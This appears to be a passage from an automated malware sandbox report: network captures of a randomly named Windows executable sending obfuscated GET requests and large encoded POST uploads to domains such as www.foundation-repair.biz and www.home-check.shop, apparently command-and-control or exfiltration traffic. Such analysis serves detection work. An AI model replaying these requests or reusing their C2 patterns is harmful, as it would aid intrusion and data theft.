                                                Data Ascii: 1NGHzVxC07D7FS852tkWHQQ/MCn1MGUMalXQi/qt/YjFJdOcRiXqOM2y16D1XcQoFFIKwNPGhTil2altHXOHNhxmCTp9IMUZKcMreeMiJMSy/nvmtgaTXC7WYKNolMOl0S1cRhbo1rGp//6cFPCslYedbsQUqhwwP/eswJnF9lFyxv8PfMsE6FDrRsCA4RO5kFsVQjc9oAdSsA+jcf/IuwodTtQZaSisS2rBTuDRElsvx1zlep1
                                                Aug 27, 2024 08:00:29.944204092 CEST6445OUTData Raw: 52 6e 4f 49 4f 37 52 57 52 79 62 46 67 44 56 6a 69 6a 54 6c 4d 36 41 65 59 33 58 41 70 72 61 74 6d 5a 44 30 34 51 45 34 58 6b 54 77 44 31 64 31 59 59 70 37 71 38 38 35 76 30 7a 34 30 55 74 53 2b 30 38 67 4e 4b 33 75 35 52 46 50 65 46 36 4d 5a 56
                                                Data Ascii: RnOIO7RWRybFgDVjijTlM6AeY3XApratmZD04QE4XkTwD1d1YYp7q885v0z40UtS+08gNK3u5RFPeF6MZVa4mHJwJHxLwtolr5u1WzPPAolAM/8UT2bwlJn7ik6jez5E/K9BbXxuK5/mFJ4t1cZDSsYruDNVTUgDsu7D1YAmBhMHV8Cstfv3clkQPq40mA2dbsuEEbqacScW+LCi+KHeW2Yk92Rg7CFdzVijii42NTOJXg8lgNd
                                                Aug 27, 2024 08:00:30.182931900 CEST1289OUTData Raw: 4e 78 4e 4b 42 50 53 57 52 6a 32 38 63 62 39 54 6d 61 64 52 59 36 6a 66 73 4a 4a 4f 4f 4a 42 49 76 6c 66 74 44 38 5a 54 38 43 36 54 51 6f 35 39 66 61 52 51 6d 72 67 59 66 51 77 41 56 35 48 49 42 78 61 38 39 42 6d 67 36 42 63 4c 49 53 31 53 4d 32
                                                Data Ascii: NxNKBPSWRj28cb9TmadRY6jfsJJOOJBIvlftD8ZT8C6TQo59faRQmrgYfQwAV5HIBxa89Bmg6BcLIS1SM2/TRc9UeIwii1ZIHqZ4eUJmCzu1IGHtiZpQMYckpsjddVPYorpg2Gj7T69Jop2BoJsT+WZu9KF+9JhZEm9/9eA5Z7p/lRLc2XMwPPb+tZASAD3hgK1MUGNgFaMLn7nK02ouDv0uU+5qRBpMANLGGst0ZZ8nmrkPQTy
                                                Aug 27, 2024 08:00:30.481420994 CEST292INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:00:30 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Content-Encoding: gzip
                                                Data Raw: 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 0b 4a cd 49 2c 49 4d 51 08 48 4c 4f 55 c8 cb 2f 51 48 cb 2f cd 4b b1 d1 07 4a d9 14 d8 05 e7 17 15 55 ea 28 94 a7 2a 24 27 e6 81 65 33 f3 52 14 4a 32 12 4b 14 0a 80 1a f4 6c f4 0b ec 00 92 2e 89 84 46 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 540JI,IMQHLOU/QH/KJU(*$'e3RJ2Kl.F0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                36192.168.11.2049877185.230.15.3807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:00:32.482604980 CEST549OUTGET /ns8q/?wXB=brv4Erb&ij60MtY=Inf42ZVLRw6HwISCOPUKL9E43+GpX4bkPpg82teOxrbDSww0PzIRQy8gHWXiaO2t1uZOdy10GUfR4hRxDB6Ts5zJpETBxtnbe//OQKeepMDnU8nxUbj7e0s= HTTP/1.1
                                                Host: www.home-check.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:00:32.773437023 CEST254INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:00:32 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Data Raw: 34 36 0d 0a 3c 68 31 3e 52 65 6c 61 74 65 64 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 53 6f 72 72 79 2c 20 77 65 20 63 61 6e 6e 6f 74 20 66 69 6e 64 20 74 68 61 74 20 70 61 67 65 2e 3c 2f 70 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 46<h1>Related Page not found</h1><p>Sorry, we cannot find that page.</p>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                37192.168.11.2049878199.59.243.226807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:00:37.892110109 CEST841OUTPOST /enra/ HTTP/1.1
                                                Host: www.foundation-repair.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.foundation-repair.biz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.foundation-repair.biz/enra/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 4a 73 68 79 66 65 61 55 65 56 41 50 39 4e 38 4a 4b 4f 39 6e 59 4a 4e 32 57 61 47 63 61 53 5a 69 65 52 72 63 5a 6d 31 4a 71 71 70 42 68 73 5a 54 70 6f 2b 55 31 44 56 48 2f 7a 74 69 42 36 54 47 7a 50 31 64 71 7a 41 6b 71 62 4b 42 34 46 66 37 62 66 47 67 56 55 6b 57 51 66 59 66 75 4d 39 46 75 45 70 5a 6d 4a 38 77 37 52 70 2f 72 53 56 55 6c 4a 4d 36 53 74 43 69 74 51 45 6e 59 75 66 42 62 39 74 75 48 31 56 65 52 57 4c 43 6e 38 59 41 7a 65 6d 4a 74 69 52 5a 33 45 72 50 4d 69 4c 37 71 74 6b 6c 49 78 77 70 4c 30 69 48 5a 34 4d 58 77 70 43 54 4d 32 57 68 4b 62 56 6a 6a 53 52 46 47 77 3d 3d
                                                Data Ascii: ij60MtY=JshyfeaUeVAP9N8JKO9nYJN2WaGcaSZieRrcZm1JqqpBhsZTpo+U1DVH/ztiB6TGzP1dqzAkqbKB4Ff7bfGgVUkWQfYfuM9FuEpZmJ8w7Rp/rSVUlJM6StCitQEnYufBb9tuH1VeRWLCn8YAzemJtiRZ3ErPMiL7qtklIxwpL0iHZ4MXwpCTM2WhKbVjjSRFGw==
                                                Aug 27, 2024 08:00:37.994493008 CEST1200INHTTP/1.1 200 OK
                                                date: Tue, 27 Aug 2024 06:00:37 GMT
                                                content-type: text/html; charset=utf-8
                                                content-length: 1150
                                                x-request-id: 3cc0cd51-e59e-4b4b-b0cf-cb03530b3db4
                                                cache-control: no-store, max-age=0
                                                accept-ch: sec-ch-prefers-color-scheme
                                                critical-ch: sec-ch-prefers-color-scheme
                                                vary: sec-ch-prefers-color-scheme
                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JUMrpzS0JSo3kDHGSd/xi71RDfm47M+ByYOqjzjPWIcDOSqxFj69EvnNniURFyze+eaWU9XrKZoupVKXUE0SVA==
                                                set-cookie: parking_session=3cc0cd51-e59e-4b4b-b0cf-cb03530b3db4; expires=Tue, 27 Aug 2024 06:15:37 GMT; path=/
                                                connection: close
                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4a 55 4d 72 70 7a 53 30 4a 53 6f 33 6b 44 48 47 53 64 2f 78 69 37 31 52 44 66 6d 34 37 4d 2b 42 79 59 4f 71 6a 7a 6a 50 57 49 63 44 4f 53 71 78 46 6a 36 39 45 76 6e 4e 6e 69 55 52 46 79 7a 65 2b 65 61 57 55 39 58 72 4b 5a 6f 75 70 56 4b 58 55 45 30 53 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JUMrpzS0JSo3kDHGSd/xi71RDfm47M+ByYOqjzjPWIcDOSqxFj69EvnNniURFyze+eaWU9XrKZoupVKXUE0SVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI1
                                                Aug 27, 2024 08:00:37.994594097 CEST639INData Raw: 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77
                                                Data Ascii: 2P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiM2NjMGNkNTEtZTU5ZS00YjRiLWIwY2YtY2IwMzUzMG


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                38192.168.11.2049879199.59.243.226807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:00:40.530560970 CEST1181OUTPOST /enra/ HTTP/1.1
                                                Host: www.foundation-repair.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.foundation-repair.biz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.foundation-repair.biz/enra/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 4a 73 68 79 66 65 61 55 65 56 41 50 37 74 4d 4a 47 4e 56 6e 49 5a 4e 70 54 61 47 63 54 79 5a 35 65 52 76 63 5a 6e 42 6e 71 63 35 42 67 4f 42 54 6f 70 2b 55 79 44 56 48 71 44 74 37 4c 61 54 5a 7a 50 34 6f 71 33 45 6b 71 66 69 42 36 33 58 37 50 2f 47 68 42 6b 6b 58 58 66 59 63 6c 73 39 62 75 45 6b 79 6d 4e 30 77 37 69 74 2f 71 52 74 55 76 39 51 35 46 39 43 6f 35 67 45 6b 44 2b 66 54 62 38 51 62 48 30 78 67 52 6b 58 43 70 39 34 41 77 65 6d 49 6c 53 51 66 6f 55 71 43 44 42 6d 77 6d 64 59 4f 4a 53 52 78 43 55 4f 63 56 6f 45 78 39 37 69 49 64 6d 57 72 43 49 63 49 76 69 67 35 57 69 31 41 45 30 37 45 4e 2b 44 4c 4b 58 37 63 35 66 39 36 46 6c 34 68 33 2f 30 46 74 43 79 6d 44 38 68 31 4e 48 54 35 46 36 71 67 59 39 72 73 58 36 55 6f 74 31 4d 2b 7a 50 71 6e 56 38 55 33 4e 6e 73 43 6d 5a 5a 49 61 63 74 2f 76 39 72 6b 47 70 43 42 6d 62 4f 4e 61 54 75 44 72 38 43 38 61 62 73 49 2f 2f 38 4f 76 50 61 4a 6a 33 47 66 37 68 74 76 50 63 57 35 7a 79 69 58 4b 61 4c 76 54 62 71 55 4b 75 75 38 49 58 [TRUNCATED]
                                                Data Ascii: ij60MtY=JshyfeaUeVAP7tMJGNVnIZNpTaGcTyZ5eRvcZnBnqc5BgOBTop+UyDVHqDt7LaTZzP4oq3EkqfiB63X7P/GhBkkXXfYcls9buEkymN0w7it/qRtUv9Q5F9Co5gEkD+fTb8QbH0xgRkXCp94AwemIlSQfoUqCDBmwmdYOJSRxCUOcVoEx97iIdmWrCIcIvig5Wi1AE07EN+DLKX7c5f96Fl4h3/0FtCymD8h1NHT5F6qgY9rsX6Uot1M+zPqnV8U3NnsCmZZIact/v9rkGpCBmbONaTuDr8C8absI//8OvPaJj3Gf7htvPcW5zyiXKaLvTbqUKuu8IXAGZcpoqLjsGQy3xMDp32VGO6/PssQVpAwa+kPQI1cZ2rexlems4IzNgMYW0QOBmEnUnNEi06Vc53+PMmmzRo5e1sxBWiR4PfcMQJU3O4qlgAw8meL1GAXqSv4x9huRRgvZcgQdUm/G0DiXKcOj+y6r3ZmDSCT1fRDrzhEH+XOa3vKDNd50NAIsfquzDj+fK0/Wc9nuuT1pE1M=
                                                Aug 27, 2024 08:00:40.633126974 CEST1200INHTTP/1.1 200 OK
                                                date: Tue, 27 Aug 2024 06:00:39 GMT
                                                content-type: text/html; charset=utf-8
                                                content-length: 1150
                                                x-request-id: 5d474b03-ff77-4a95-9c4f-b0acbe0680c3
                                                cache-control: no-store, max-age=0
                                                accept-ch: sec-ch-prefers-color-scheme
                                                critical-ch: sec-ch-prefers-color-scheme
                                                vary: sec-ch-prefers-color-scheme
                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JUMrpzS0JSo3kDHGSd/xi71RDfm47M+ByYOqjzjPWIcDOSqxFj69EvnNniURFyze+eaWU9XrKZoupVKXUE0SVA==
                                                set-cookie: parking_session=5d474b03-ff77-4a95-9c4f-b0acbe0680c3; expires=Tue, 27 Aug 2024 06:15:40 GMT; path=/
                                                connection: close
                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4a 55 4d 72 70 7a 53 30 4a 53 6f 33 6b 44 48 47 53 64 2f 78 69 37 31 52 44 66 6d 34 37 4d 2b 42 79 59 4f 71 6a 7a 6a 50 57 49 63 44 4f 53 71 78 46 6a 36 39 45 76 6e 4e 6e 69 55 52 46 79 7a 65 2b 65 61 57 55 39 58 72 4b 5a 6f 75 70 56 4b 58 55 45 30 53 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JUMrpzS0JSo3kDHGSd/xi71RDfm47M+ByYOqjzjPWIcDOSqxFj69EvnNniURFyze+eaWU9XrKZoupVKXUE0SVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI1
                                                Aug 27, 2024 08:00:40.633229017 CEST639INData Raw: 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77
                                                Data Ascii: 2P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNWQ0NzRiMDMtZmY3Ny00YTk1LTljNGYtYjBhY2JlMD


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                39192.168.11.2049880199.59.243.226807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:00:43.171567917 CEST2578OUTPOST /enra/ HTTP/1.1
                                                Host: www.foundation-repair.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.foundation-repair.biz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.foundation-repair.biz/enra/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 4a 73 68 79 66 65 61 55 65 56 41 50 37 74 4d 4a 47 4e 56 6e 49 5a 4e 70 54 61 47 63 54 79 5a 35 65 52 76 63 5a 6e 42 6e 71 63 78 42 68 39 4a 54 70 4b 57 55 7a 44 56 48 32 54 74 6d 4c 61 53 46 7a 50 67 6b 71 79 64 54 71 5a 6d 42 36 6c 76 37 50 70 71 68 52 55 6b 55 59 2f 59 65 75 4d 39 48 75 45 70 72 6d 4d 45 67 37 52 78 2f 72 57 52 55 72 4d 51 36 48 74 43 69 35 67 45 65 48 2b 65 6b 62 39 6b 4c 48 30 4e 67 52 6e 7a 43 6f 50 41 41 79 74 2b 49 73 69 51 51 6e 30 71 5a 4e 68 6d 56 6d 64 4d 30 4a 53 51 45 43 52 2b 63 56 76 77 78 79 5a 4b 4c 63 47 57 72 4d 6f 63 4c 72 6e 34 39 57 68 42 69 45 77 37 45 4e 35 33 4c 4b 33 37 63 76 75 38 73 42 46 35 71 7a 2f 30 53 6e 69 2b 75 44 38 31 62 4e 47 6e 35 46 71 2b 67 43 71 33 73 51 65 34 6f 74 56 4d 38 2b 76 71 77 61 63 56 32 4e 6a 42 70 6d 5a 34 39 61 62 56 2f 76 66 6a 6b 44 4c 71 65 67 37 4f 48 47 44 76 42 68 63 2f 7a 61 62 39 5a 2f 2f 38 67 76 4e 32 4a 6a 43 4f 66 36 67 74 6f 4d 4d 57 2b 37 53 69 43 64 4b 48 66 54 61 48 62 4b 75 57 73 49 51 [TRUNCATED]
                                                Data Ascii: ij60MtY=JshyfeaUeVAP7tMJGNVnIZNpTaGcTyZ5eRvcZnBnqcxBh9JTpKWUzDVH2TtmLaSFzPgkqydTqZmB6lv7PpqhRUkUY/YeuM9HuEprmMEg7Rx/rWRUrMQ6HtCi5gEeH+ekb9kLH0NgRnzCoPAAyt+IsiQQn0qZNhmVmdM0JSQECR+cVvwxyZKLcGWrMocLrn49WhBiEw7EN53LK37cvu8sBF5qz/0Sni+uD81bNGn5Fq+gCq3sQe4otVM8+vqwacV2NjBpmZ49abV/vfjkDLqeg7OHGDvBhc/zab9Z//8gvN2JjCOf6gtoMMW+7SiCdKHfTaHbKuWsIQgGY8pousXvIgywzMD/6WVVO6yssu9opwca4UfQCFcembe9u+mm8IzNgMUj0RyBmwjUpfcixrVc73+JMmn1Ro191sprWiATPcwMRYE3DaCm3wwDr+LYJgr9Sv059henRQTZdhsdDW/J+DiUdsOP1S+33Z61SGblfRrry1FIu1KyppPAHe9KMWYuQ469PBiOEh7becPHtyVyZRJYq4fzgQV6ESIlzICr60BG4/I/pxQZvSkxzXzwMgHLC1AaG4GXJsw1VB2tZ/OIwUSlxdxPdcGMpmxBH8cIrRx3mEQj9kMNj6js4E4rWcD/BfK4+VUmY/T+Zy692Z5igbmF1JlCIZ8FNMa1kxBy5PT/TAcLbsrXSpS2OCf8jgaCRHmmWzm9Vx/gDcdSZcHB7ssEemarrkOH7/vZicqoOtucbRwPyfxny/UI7FdeTxaqxFr0qcS0tua9zXl+77Lgcik0t8dmnwiOEADPxNAHAqYeSbnei1RrhafRTao44Ek1zdp/djfV6g6C/Y0LXfURbeZeZ2reU6Hb7VimhXNtKLjM2F0ly7n2YR7GxD4U79f1vMQ4oC5ORCKhuFJDj0hOS4nlV8WubUvsDNyP050thgaiMsM3Mr8glFIJFqCyxrgPD8+U6bs7d371qeWeiHGRl/iOhS1J4YSh6iM9Jm4QaX2S [TRUNCATED]
                                                Aug 27, 2024 08:00:43.171602964 CEST6445OUTData Raw: 75 38 62 68 71 6f 76 79 42 47 57 37 62 34 72 52 6c 4b 66 6a 30 4e 52 43 55 67 55 39 65 63 75 6e 39 71 4b 36 64 61 33 77 52 70 48 75 68 71 37 78 38 4c 4c 75 6b 4a 72 41 57 67 62 4b 37 47 71 46 37 54 72 39 4d 54 52 59 67 56 38 54 4e 4b 49 4c 78 72
                                                Data Ascii: u8bhqovyBGW7b4rRlKfj0NRCUgU9ecun9qK6da3wRpHuhq7x8LLukJrAWgbK7GqF7Tr9MTRYgV8TNKILxrLbrYhH5OAGz1aD3VnP1Q0oYRIZR3p0R/Yz+Pb3iDkGlZzHQ6jpDlXBhGzC7VOWlfGSZKkvTchfmpSZD93D1ImDkbIQia5CQGW/JF7gJXfdDll2dVclUM8FWRR5lFd9eHeX6Sik3dhQzSnNFAX7oBz5yhHPwVeetkX
                                                Aug 27, 2024 08:00:43.171670914 CEST2578OUTData Raw: 2f 46 72 4f 49 36 63 61 57 37 66 68 39 70 73 6b 46 64 75 62 2f 6c 70 36 48 47 7a 2b 4c 67 33 4d 4f 34 72 58 30 38 58 57 71 50 38 33 49 44 53 50 2f 2b 57 51 37 46 44 4e 53 32 39 64 73 33 51 69 54 47 6a 4a 6b 50 6b 34 6b 33 79 51 30 49 31 6d 4c 50
                                                Data Ascii: /FrOI6caW7fh9pskFdub/lp6HGz+Lg3MO4rX08XWqP83IDSP/+WQ7FDNS29ds3QiTGjJkPk4k3yQ0I1mLP/fdXNVPBPVx7qYL36R8eaIgBagrTbT+HFivK4gECp8GHCD36jNVQhwX67iPdoxSxCtLn5eTPtDAdmOVJJPGf64VQNkW/Y3ed+UVd3LyGjp4yI+MUcI5MurANadKc/TWgXYL+RDhHSsJcXuntd9oqS1Pzh23B1TdgC
                                                Aug 27, 2024 08:00:43.171843052 CEST1289OUTData Raw: 45 71 39 76 43 34 2f 57 6d 4b 56 76 31 55 67 56 72 54 77 62 7a 76 72 48 31 54 7a 50 5a 74 44 30 6f 4a 47 62 65 30 65 6b 30 75 4f 56 45 69 32 48 64 48 78 48 4c 6b 76 6e 46 46 42 39 4c 5a 58 76 4a 6a 4c 4b 51 4b 35 36 34 39 5a 4f 62 2f 43 30 77 39
                                                Data Ascii: Eq9vC4/WmKVv1UgVrTwbzvrH1TzPZtD0oJGbe0ek0uOVEi2HdHxHLkvnFFB9LZXvJjLKQK5649ZOb/C0w95t8PFGO+B0W3QAkUqXOsBgbPFu9ZVQ//EsXQGeOfbvL0hIjk5td6IfXbA4d8AbGP/gYj/9SLJmqBRQDVG5iuRO7PRRD73H+2Iz4fqc1nebMCcmDq+/NCBuwSiVar+QRpWw7MPdpl2uE2Bf6amR6g8DBeOIWjB4DgE
                                                Aug 27, 2024 08:00:43.272478104 CEST2578OUTData Raw: 6f 56 4b 46 45 50 5a 4b 34 38 63 63 59 36 6a 58 56 39 4a 4c 65 5a 71 63 35 47 59 73 6e 72 2f 67 6d 31 64 41 4b 31 4a 71 6f 56 75 79 4c 44 77 45 78 71 49 68 6f 37 59 45 72 47 32 6f 39 63 31 68 6f 47 77 5a 37 35 68 46 47 4f 4b 39 74 37 4f 4e 42 6e
                                                Data Ascii: oVKFEPZK48ccY6jXV9JLeZqc5GYsnr/gm1dAK1JqoVuyLDwExqIho7YErG2o9c1hoGwZ75hFGOK9t7ONBns86k3IdOZS3/vN/gznMA0VUCQWPJ53Wp9CCMNRn4hE/Az3U8avZcupoeUkiul0SU2zc1Ss3hTy3oU6W/0jHIqIRXaJx7xuCFMA55UDFNNp9mqPIc6UlApNtrBqaAN2gxXgO0kq6FlZB03cGG4Ba1ke+bu9n/DAkiN
                                                Aug 27, 2024 08:00:43.272648096 CEST5156OUTData Raw: 51 5a 63 31 35 53 39 6a 51 6b 53 72 6f 30 67 67 77 72 36 39 4c 4f 67 32 44 4c 2b 42 2b 63 54 6a 35 4c 61 41 75 56 38 4c 77 42 58 6c 6c 55 6d 30 6e 78 33 4e 77 36 75 32 67 4b 4c 43 59 75 6c 70 66 65 39 70 30 53 4a 69 67 70 4c 76 54 6e 30 79 67 55
                                                Data Ascii: QZc15S9jQkSro0ggwr69LOg2DL+B+cTj5LaAuV8LwBXllUm0nx3Nw6u2gKLCYulpfe9p0SJigpLvTn0ygU0bZWhTvFvW+se4NQef4/8i0ltrWYKdtXA+RzezhJ4kRblfgzEpZGjP79c8/m8U2sheiwRrpG4OdVrBV4mben0py6hJk/nP7QmEhHU6Cs070NizwWYowpyIar76bFZ4dZjyRZ43yM6FQwrSR07UC6Rwz9MGfU2jPrH
                                                Aug 27, 2024 08:00:43.272793055 CEST5156OUTData Raw: 57 48 52 63 6a 50 7a 6c 47 52 55 6f 6f 4a 53 73 6d 4f 52 30 36 6b 71 64 2b 78 79 34 6f 59 50 44 4b 41 7a 73 64 6c 30 6d 77 32 2f 2b 4f 2f 4a 39 4a 2f 4d 34 6c 51 45 50 4e 71 48 34 44 53 42 30 38 5a 6d 50 61 4c 56 30 6f 49 38 45 58 70 48 70 6a 79
                                                Data Ascii: WHRcjPzlGRUooJSsmOR06kqd+xy4oYPDKAzsdl0mw2/+O/J9J/M4lQEPNqH4DSB08ZmPaLV0oI8EXpHpjyyL3lq3QQwrrgDXz8kB8DG0aPA/fDXktfNfSSGbG8REnv05R1QU+AnR9XVVNSPztzoUtfCepwHwzWnk71eStbn0CMHjn504js+SCFof4WetjdsInO8wf245Rh9no0Q5V2Vss6Qn/O4Yx4eoLdGaACMgcI/0UwHG7c0
